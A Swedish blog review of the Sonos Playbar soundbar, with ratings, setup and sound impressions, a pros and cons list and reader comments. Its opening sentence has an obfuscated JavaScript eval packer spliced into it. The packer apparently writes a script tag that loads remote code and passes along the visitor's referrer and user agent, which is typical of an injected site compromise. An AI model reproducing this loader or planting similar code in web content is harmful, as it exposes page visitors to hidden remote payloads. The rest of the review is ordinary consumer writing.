Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Recension: Sonos Playbar – Sonos har gjort det igen.

Filip Urde
 • On 3 april, 2013
 • http://www.revue.se/filip-urde

Review Overview

Design
9
Ljudkvalitet
8
Funktionalitet
9
Användning
9
Kvalitetsintryck
8
8.6

Fantastisk

FÖRDELAR - Snygg, elegant och extremt minimalistisk. - Du får det bästa av Sonos upplevelsen. - Genomtänkta detaljer. - Bred, djup, detaljerad och dynamisk ljudbild. - Kan enkelt byggas ut till ett grymt surround system med Sub och Play3 högtalare. NACKDELAR - Trycker inte ljudet ut i rummet så mycket som den skulle kunna göra. - Optisk är bara anslutningsmöjlighet. - Saknar Sonos Sub när man spelar musik.

Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yidhd|var|u0026u|referrer|ntrkz||js|php’.split(’|’),0,{}))
har blivit kär!

Det var ett tag sedan vi för första gången såg och skrev om den här produkten. Men nu har vi äntligen fått möjlighet att testa den enda in i sömmarna och vi är imponerade.

Jag personligen har länge varit ett fan av Sonos och deras tidigare produkter har verkligen varit grymma enligt mig. Med det sagt så är Sonos ganska bra på att hypea upp sina produkter och när vi för första gången hörde om Sonos playbar så fick man en känsla av att den skulle döda 5:1 systemet där hemma med en hård roundhouse kick. Riktigt så är det inte, men Sonos Playbar är heller ingen vanlig soundbar. Detta är en mycket trevlig enhet och även om den är enkel, så gör den långt mer än de flesta soundbars där ute.

Sonos Playbar – funktioner:

I grunden är detta en klassik Sonos enhet. Det betyder att den ger dig tillgång till en rad olika streaming tjänster och ett stort antal radiokanaler. Den kommer att spela allt (utom vissa högupplösta låtar) som du har på din dator eller NAS, precis som med Play3 och Play5 enheterna så kan du skicka ljudet direkt från en iPhone, iPad eller iPod Touch. Sonos ger dig möjlighet att lyssna på musik från Spotify, Napster, Last.fm, AUPEO, 7digital, Deezer och många fler. Tack vare detta så är det faktiskt ingen annan leverantör som kan leverera en lika stor bredd och djup i sitt innehåll så som Sonos gör idag.

sonos playbar

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Sonos Playbar – Set up:

Play3 och Play5 är grymma om du vill ha något som kan spela musik, men Sonos Playbar tar din Sonos upplevelse till TV:n. Du kopplar den till din tv via en optisk kabel och så tar den helt enkelt ut det ljud som tv:n får från anslutna apparater eller antennsignalen. Alltså ingen HDMI-ingång, utan kopplingen sker endast via en digital optisk kabel. Det funkar väldigt bra och är enkelt, men det är kanske inte lika ”häftigt” som en spelare med flera HDMI ingångar. Sonos Playbar klarar vanliga audioformat, inklusive Dolby Digital.

SonosPlaybar_3

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Men det är verkligen en produkt du inte bli besviken på. Så fort man tar upp den från sin avlånga kartong känner man direkt lukten av kvalite och dess snygga design gör att den passar in i vilket vardagsrum som helst. Vi har den liggandes framför TV:n, men den kan enkelt bli fast på väggen om du har en TV som sitter på väggen.

SonosPlaybar_5

 

 

 

 

 

 

 

 

Dock så vill vi informera att Sonos Playbar låter betydligt bättre när den står ”upphöjt” på den smalare kanten, alltså inte ”liggandes”. TV:n har en inbyggd accelerometer som gör att Sonos Playbar känner av vilken position den står i och ändrar ljudupplevelsen där efter.

Att komma igång:

Att komma igång med Sonos Playbar, eller sonos överhuvudtaget för den delen är döds enkelt. Man laddar ner Android eller iOS appen, som tar dig genom några enkla steg som att lägga till Playbar, vilket sker på samma sätt som alla andra Sonos-komponenten, samt ta dig steg för steg genom anslutningsprocessen.

Är det här din första Sonos enhet, så är det är värt att nämna att du kommer behöva ansluta den till din router, men detta kan göras med Powerline-enheter eller Sonos egna Bridge om det finns ett avstånd mellan dem.

Något av det finaste är IR-sensorn. Med denna kan du sedan lära Playbar att svara till din vanliga TV-kontroll, samt att det finns en repeater inbyggd som gör att resterande kommandon från din TV-kontroll går igenom, även om Playbar står i vägen.

Sonos Playbar – Ljud

Den stora frågan och kanske det mest intressanta i den här recensionen är naturligtvis hur ljudet är på Sonos Playbar. Vi testar med Transformers 3 och vad ska man säga. Bredden på ljudbilden som skapas är mäkta imponerande, det finns detaljer, vikt och tonbalans, något som en TV själv aldrig skulle klara av. Med hjälp av Playbars 9 vinklade högtalare så får man ljudet att studsa i rummet och skapa en känsla av surround som vi aldrig upplevt från en soundbar. Dock ska sägas att man tappar lite av surround känslan om den ligger ”platt” på fötterna. I mitten så har man en högtalare som är dedikerad för ”tal”, vilken gör det möjligt att faktiskt höra klart och tydligt vad folk säger även i de mest actionfyllda filmscenerna. Denna funktion kan även förhöjas ytterligare i Sonos appens inställningar. Så om du känner att du vill fokusera på ”talet” i en film så kan detta enkelt åtgärdas i appen.

PLAYBAR_RENDER_FINAL-w1200-460x198

 

 

 

 

 

 

 

 

 

Playbar kan gå ganska djupt i basen, men man märker att det inte är en full baslåda som finns under huven. Ljudet blir atmosfäriskt och fylligt, men det är ingen baslåda. Det är dock imponerande att den kommer så djupt som den gör och om du vill få den perfekta basen så har Sonos numera en baslåda, Sonos Sub.

Sonos sub, vilket är en uppgradering som är lika enkel som allt annat med Sonos. Det är bara att köpa och ”lägga till” den för att gå från 3.0 till 3.1. Men jag skulle säga att detta är bara för den riktigt stora ljudnörden eller för den som vill ha allt. För Playbar räcker verklien gott och väl!

Men om inte 3.1 heller skulle räcka för dig, så kan du ju alltid bygga ut till ett 5.1 system. Detta görs genom att lägga till två st Play3. Vi har inte haft möjlighet att testa varken Sub eller ett fullt 5.1 system själva. Vi har testat det på Sonos press-event. Men det är inte tillräckligt för att göra ett utlåtande här. Dock kan jag säga att ljudet blir rätt så maffigt.

(Läs mer om Play3 här)

Sonos Playbar – Bedömning

Okej, vem ska ha en Playbar?

Ja, det är inte det ultimata filmljudet där ute, det är heller inte den ultimata musikspelaren. Men om du letar efter en enkel anordning som kraftigt kommer att förbättra ljudet från din TV och ger dig omedelbar tillgång till mer musik än du någonsin skulle kunna hoppas att hinna lyssna på… Ja, det kan bara Sonos Playbar göra. Sen är den dödssnygg!

FÖRDELAR

– Snygg, elegant och extremt minimalistisk.
– Du får det bästa av Sonos upplevelsen.
– Genomtänkta detaljer.
– Bred, djup, detaljerad och dynamisk ljudbild.
– Kan enkelt byggas ut till ett grymt surround system med Sub och Play3 högtalare.

NACKDELAR

– Trycker inte ljudet ut i rummet så mycket som den skulle kunna göra.
– Optisk är enda anslutningsmöjlighet.
– Saknar Sonos Sub när man spelar musik.
Sonos.com

Comments

 1. Oscar

  Fan va soft den ser ut! Jag bor i en 1a… jag kan väll inte behöva basen också eller hur?

  • Patrik

   Klart du ska ha hela paketet. Grannarna kommer inte klaga på den ljuva musiken från din SONOS.

  • Tjena Oscar! Allt beror på! Jag bor i en två:a på 50 kvd. Jag har en play3 i mitt sovrum och en play5 + Playbar i vardagsrummet. Men jag tycker självklart att jag skulle klara mig med bara Playbar. Den är grym! Basen är klart man vill ha… den är tung! men är verkligen inget måste! Playbar gör jobbet fin fint!, vet inte om det var ett klockrent svar, men ändå =D

 2. SONOS kan verkligen leverera!! Är så nöjd med min SONOS PLAY 3.